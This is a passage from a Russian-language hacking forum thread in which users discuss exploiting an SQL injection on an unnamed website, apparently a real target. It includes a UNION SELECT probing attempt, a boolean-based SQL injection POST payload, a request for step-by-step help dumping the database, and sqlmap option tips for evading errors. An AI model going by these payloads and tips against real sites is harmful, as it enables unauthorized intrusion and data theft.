    Затем пытался подобрать таблицы методом order by и вручную union+select+1,2,3-- и тут я везде натыкался на саму ошибку:
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 2' at line 1
    
    Поэтому и возникает первоначальный вопрос: почему ручками вижу багу но не могу заюзать ,а sqlmap тоже вначале видит багу, а потом уже говорит - нет не бага...или дело здесь тоже не в нем.
     
  18. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    783
    Likes Received:
    912
    Reputations:
    58
    Кидай сылку
     
    cat1vo likes this.
  19. LoginUserName

    LoginUserName New Member

    Joined:
    14 Apr 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    К сожалению, в ручную не особо умею. Можете подсказать, как в ручную по этапно слить базу с такой уязвимость
    Post данные
    Code:
    sasai=-1'%20OR%203*2*1=6%20AND%20000646=000646%20--%20
    Буду благодарен
     
  20. cna

    cna New Member

    Joined:
    10 Feb 2018
    Messages:
    7
    Likes Received:
    0
    Reputations:
    1
    $?пм или читай https://forum.antichat.ru//threads/43966/
    исп норм соответствие урленкоде с --no-cast --hex --text-only кодировку можно указывать и енкодинг разный так же влияет при блиндах таймауты и конечно --drop-set-cookie --flush-session
     
    #660 cna, 18 Apr 2018 at 9:16 PM
    Last edited: 18 Apr 2018 at 9:23 PM
Loading...